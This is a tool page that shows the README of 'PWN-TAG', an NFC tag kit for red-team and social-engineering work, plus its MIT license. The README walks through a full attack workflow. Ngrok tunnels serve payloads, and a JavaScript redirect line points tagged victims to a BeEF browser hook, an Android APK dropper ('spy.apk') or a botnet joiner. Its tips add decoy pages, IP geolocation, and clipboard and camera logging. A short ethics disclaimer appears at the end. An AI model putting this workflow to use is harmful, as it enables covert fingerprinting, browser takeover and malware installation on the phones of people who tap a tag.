← back to tools

PWN-TAG

8 files · ready for inspection

readme

# PWN-TAG OG this version works best for non paid ngrok accounts --- # There are 2 branches in this repository: -the main branch is for no zero click payload delivery due to no paid ngrok accout. and the pwn_tag_pro branch allows for android zero click payload delivery with paid ngrok account. MAKE SURE YOU ARE IN THE RIGHT BRANCH OF THE REPOSITORY BEFORE PROCEEDING. toggle to switch branches found above. --- PWN TAG _"tag to pwn"_ — NFC payload delivery system for social engineering, red team ops, and mobile testing. PWN-TAG lets you write NFC tags that trigger live payloads on mobile devices — from fingerprinting to botnet enrollment. Built for ethical hackers, educators, defenders, and curious minds. --- ## Branches | Branch | Purpose | |----------------|-------------------------------------------------------------------------| | `main` | Free-tier version using randomized ngrok URLs (requires tap + confirm) | | `ngrok-pro` | Paid ngrok version with static subdomains → enables **zero-click** payloads | Switch branches like this: ```bash git checkout ngrok-pro ```` --- ## What You Need * NFC tag stickers (\~\$10 for 25): [https://a.co/d/gl2XRV8](https://a.co/d/gl2XRV8) * NFC writer app (free): [https://apps.apple.com/app/id1252962749](https://apps.apple.com/app/id1252962749) * A Debian-based Linux system * A [ngrok](https://ngrok.com/) account (free or paid) --- ## Installation (Clone + Setup) ```bash git clone https://github.com/ekomsSavior/PWN-TAG.git cd PWN-TAG ``` # (Optional) Switch to pro version for static subdomain support ```bash git checkout ngrok-pro ``` # Install Python dependencies ```bash sudo apt update sudo apt install python3 python3-pip -y pip3 install flask ``` ## ngrok Setup ```bash wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz tar -xvzf ngrok-v3-stable-linux-amd64.tgz sudo mv ngrok /usr/local/bin/ ``` Then authenticate your token: [https://ngrok.com/](https://ngrok.com/) ```bash ngrok config add-authtoken <YOUR_NGROK_AUTH_TOKEN> ``` --- ## Usage (4 Terminal Workflow) ### Terminal 1 — Start Payload Server ```bash python3 -m http.server 8080 ``` This serves your payloads at `http://localhost:8080` --- ### Terminal 2 — Start ngrok Tunnel ```bash ngrok http 8080 ``` Copy the `https://...ngrok.app` URL — this becomes your **NFC tag link**. --- ### Terminal 3 — Edit Payload Redirector ```bash nano payloads/test_shell.html ``` Update this line with your current ngrok URL: ```javascript window.location.href = "https://your-ngrok-subdomain.ngrok.app/payloads/bot_joiner.html"; ``` --- ### Terminal 4 — Start Listener ```bash python3 listener.py ``` Logs any device fingerprinting or interaction data sent by payloads. --- ## Write Your NFC Tag Using your NFC writer app: 1. Tap **Write** 2. Add Record → **URL** 3. Paste something like: ``` https://pwn-tag.ngrok.app/payloads/test_shell.html ``` 4. Tap “Write” to encode it Now when someone taps the tag, it opens the redirector → logs the device → delivers your payload. --- ## Payload Options (Examples & Use Cases) | Payload | Path | Description | | --------------------- | -------------------------- | ------------------------------------------------------------------- | | **Test Shell** | `payloads/test_shell.html` | Logs fingerprint (user agent, screen size, timezone) then redirects | | **Full Beacon Shell** | `payloads/beef_shell.html` | Loads a BEEF hook for browser control (if server is running) | | **APK Dropper** | `payloads/spy.apk` | Sends Android users a direct APK (custom implants welcome) | | **Rogue Joiner** | `payloads/bot_joiner.html` | Simulates Rogue Botnet join — connect, beacon, execute JS | --- ## Swapping Payloads (Beginner-Friendly) 1. Open `payloads/test_shell.html` 2. Change this line: ```javascript window.location.href = "https://your-ngrok.ngrok.app/payloads/YOUR_FILE_HERE"; ``` 3. Example: ```javascript window.location.href = "https://pwn-tag.ngrok.app/payloads/spy.apk"; ``` No need to rewrite the NFC tag if you're using a static domain — just update the file. --- ## Pro Tips * Make multiple redirectors (`redirect_to_apk.html`, etc.) * Make `index.html` a 403 decoy or fake blog * Want geolocation? Use `https://ipinfo.io/json` in your JS * Want deep traps? Chain to `clipboard.js`, `camlog`, etc. before redirect * With static domains (`ngrok-pro`), your NFC tags are reusable forever --- ## Ethical Usage This tool is intended for **educational purposes, red-team ops, and ethical testing only**. You are responsible for your actions. Do not use this on devices or individuals without consent.

source code

files

viewer

select a file
// click a file to view source

license

MIT License Copyright (c) 2026 ek0mssavi0r Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.
download zip // inspect all source before execution
read the code before you run it. always.